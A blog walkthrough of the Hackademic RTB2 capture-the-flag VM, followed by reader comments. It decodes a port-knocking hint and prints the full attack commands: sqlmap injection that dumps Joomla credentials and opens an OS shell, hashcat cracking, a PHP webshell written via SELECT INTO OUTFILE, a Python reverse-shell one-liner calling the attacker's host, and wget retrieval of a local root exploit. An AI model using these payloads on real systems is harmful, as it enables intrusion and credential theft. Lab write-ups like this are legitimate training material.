The Art of Webshell and Port Knocking Exploit — Hackademic RTB2

As I was browsing about webshell exploit through google, I found an interesting challenge in Vulnhub. It was Hackademic RTB2 by mr.pr0n released at 6 September 2011. The Hackademic RTB2 was one of the series CTF named Hackademic by mr.pr0n at vulnhub. Actually, there was the first serie which was Hackademic RTB1. Nevertheless, I chose the second one firstly, hahahahaa. But I promise will give a post for the Hackademic RTB1 next week.

Generally, The Hacakademic RTB2 was focused at how we can implement both of webshell exploit and port knocking concept. In kali linux especially Kali-rolling3, it has webshell scripts by default. They are PHP, ASP, ASPX, CFM, JSP and PERL based scripts. Also, the webshell exploit can be found at metasploit modules. Refered to wikipediaport knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called single packet authorization exists, where only a single “knock” is needed, consisting of an encrypted packet. The port “knock” itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine.

I think the preliminary was enough confusing us, hahaha. lets we jump to the practice how to “capture the flag” the objectives of Hackademic RTB2.

PREPARATION

  • Download the virtual machine image of Hackademic RTB2 via this link.
  • Open the Hackademic RTB2 by Vmware, and chose ” I Moved it” in order the machine can run the network interface automaticaly without we should log in at the first.
  • In this case, I used Kali Linux version 3 for the Attacker machine.

INFORMATION GATHERING

Finding the target machine in the network. I used Netdiscover for searching the actived hosts in the network and analyzed simply what the victim machine was.

After I found the target machine whose the MAC Vendor was Vmware, Inc and IP Address was 192.168.0.110, the port scanning tools, Nmap was fires up for looking over the open ports and the services running on the machine.

Based on the result of nmap scanning above, we got the information that the machine had a web service at port 80 and an unknown service at port 666. I checked the web service using web browser to find what it has on that.

The web page looked like a login page or something like ones. I scanned using tool Whatweb to find what the CMS was used by the web application.

The whatweb didnot result what type of CMS used by the web application. Then I took for searching the directories on the web service using Dirbuster. I hoped that I would find an interesting ones about the web application.

The Dirbuster showed me that the web application has a phpmyadmin page, but it was filtered. So, I tried using the simple sql injection boolean characters “ or 1=1—‘ “ for the username and password field the check page.

It showed an interesting page messages, the I tried to check the web page source, then …

It gave a long string in base64 encoded like below:

%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A

Then I decoded the string using online decoder http://urldecoder.org like below:

Fortunately, I got the hex string from the decoder. So, I tried to check what the messages from the hex string by decoded it into ascii string like below:

Finally, I got the clue about this challenge. It was a Port Knocking, certainly it was for port 666 which was filtered. After that, the binary string was decoded into ascii for finding what the packet was hide on it.

Evidently, the packet should be sent in order make a sync connection to open the 666 port was 1001:1101:1011:1001. Next, I made a bash script to make a sync using the packet string by netcat.

Then I saved the script as hackademy.sh. Next, I ran the script, but it should be change the privilege into 755.

After that, I scanned the machine using nmap to check if the port 666 had been open or not yet.

After I Opened the port service using web browser, It showed the main web page and we got informations that what cms used the web was Joomla.

open web through port 666

Then I used tool Joomscan in metasploit for finding and scanning the vulnerable aspects at the web application like below.

According to the image above, I set several parameters such as IP Address of the victim web application and port service of the application. Then I fired up the tool by type run.

The result said that the web application the vulnerability of SQL Injection at url /index.php?option=com_abc&view=abc&letter=AS&sectionid=’. For making sure and verifying the vurnerable url, I tried to check by the web browser like below.

The respond showed that the web application was vulnerable certainly. Then I exploited the SQL Injection using sqlmap for revealing and extracting the databases and the tables included the values such as credential strings by typing sqlmap -u  “http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='” –dbs

Database which I chose was joomla,because I thought the web’s database was it. So I run the sqlmap by typing sqlmap -u “http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='” –D joomla –tables in order to reveal the tables on the database.

The most interesting table was jos_users. It might contain the credentials for the application. Then I ran the sqlmap to reveal what the columns are by typing sqlmap -u “http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='” –D joomla –T jos_users –columns

I was right, then continued to extract the credentials which were put on both columns of username and password. The sqlmap script for extracting the credential which were stored on these columns was sqlmap -u “http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='” –D joomla –T jos_users –C username,password,usertype –dump

The credentials which were cracked succesfully by hashcat were JSmith’s password and BTallor’s password. The wordlists which were used by me was rockyou.txt that is stored by default in Kali 3.

hashcat -m 11 -a 0 pass-hash-hackademy.txt /usr/share/wordlists/rockyou.txt –force

Remeber that sqlmap has an special option which is –os-shell. It prompts for an interactive operating system shell. So we can run the command of the operating system of the target. At this context, the victim was Ubuntu, so by applied the os-shell options, I could run the ubuntu command shell.

sqlmap -u “http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS§ionid='” –os-shell

After I enumerated the files which was stored on the working directory, I found the file “configuration.php”. As we have known that the configuration.php is used to store credential parameters for setting the system. So I checked the content like below.

And wow, the file had the values credential informations in a plaintext strings. I found the credentials for mysql. So I verified the credentials to log into the mysql phpmyadmin using web browser.

The missuse that applied by the programmer was using root as username for phpmyadmin and stored the credentials in a plaintext. So, I could make a sql script through the phpmyadmin to create a maliciouse web scripts.

From the above images showed that creating a web script in sql command in phpmyadmin was success well. So, I tried to make a payload based php or it is known as webshell by typing SELECT “<? system($REQUEST[‘cmd’]); ?>” INTO OUTFILE “/var/www/cmd.php”

Then I ran the url 192.168.100.6:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.100.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

And I set up the listener at port 443 to catch the session.

I had gotten the session, but I didnot get the root privilege. So I should run local exploit to get root privilege access. Then I searched the local exploit in my Kali3 by typing cat files.csv | grep “linux,local” | grep -i “privilege escalation” | grep 2.6.3

I had gotten the local exploit for the victim, that was 14814.c

In order I could download the local exploit into the victim, I copied the local exploit into /var/www/html/ in my Kali3, then change the file restriction as 755. After that, through the session I downloaded the local exploit using wget.

Finally, I was success to escalate the privilege into root. For the second objective, I searched the Key.txt at root working directory.

Firstly, I checked the contain of the file using cat.

The file showed the base64 encode strings. So I decode the string.

After decoding the strings, I got the information that explained about the type of file. The type of file was PNG. Then I tried to download the file by Kali3 in order to open and see what the image was.

 

28 thoughts on “The Art of Webshell and Port Knocking Exploit — Hackademic RTB2

  1. Does your website have a contact page? I’m having a tough time locating it but, I’d like to send you an e-mail. I’ve got some ideas for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it grow over time.

  2. I’ll immediately seize your rss as I can’t find your email subscription hyperlink or newsletter service. Do you have any? Please allow me recognize so that I may subscribe. Thanks.

  3. Wow, superb blog layout! How lengthy have you ever been blogging for? you make running a blog glance easy. The full look of your web site is magnificent, as smartly as the content material!

  4. Terrific paintings! That is the kind of information that are supposed to be shared across the web. Disgrace on the seek engines for no longer positioning this post upper! Come on over and talk over with my website . Thanks =)

  5. I do agree with all of the ideas you’ve offered to your post. They are really convincing and can certainly work. Still, the posts are very short for beginners. May you please prolong them a little from next time? Thanks for the post.

  6. Hello There. I found your blog using msn. This is a very neatly written article. I’ll make sure to bookmark it and return to learn extra of your helpful information. Thanks for the post. I’ll certainly return.

  7. It’s actually a cool and useful piece of info.
    I am satisfied that you simply shared this useful info with us.
    Please keep us informed like this. Thanks for sharing.

  8. Have you ever considered creating an e-book or guest authoring on other websites? I have a blog centered on the same topics you discuss and would really like to have you share some stories/information. I know my subscribers would value your work. If you are even remotely interested, feel free to send me an email.|

Leave a Reply

Your email address will not be published. Required fields are marked *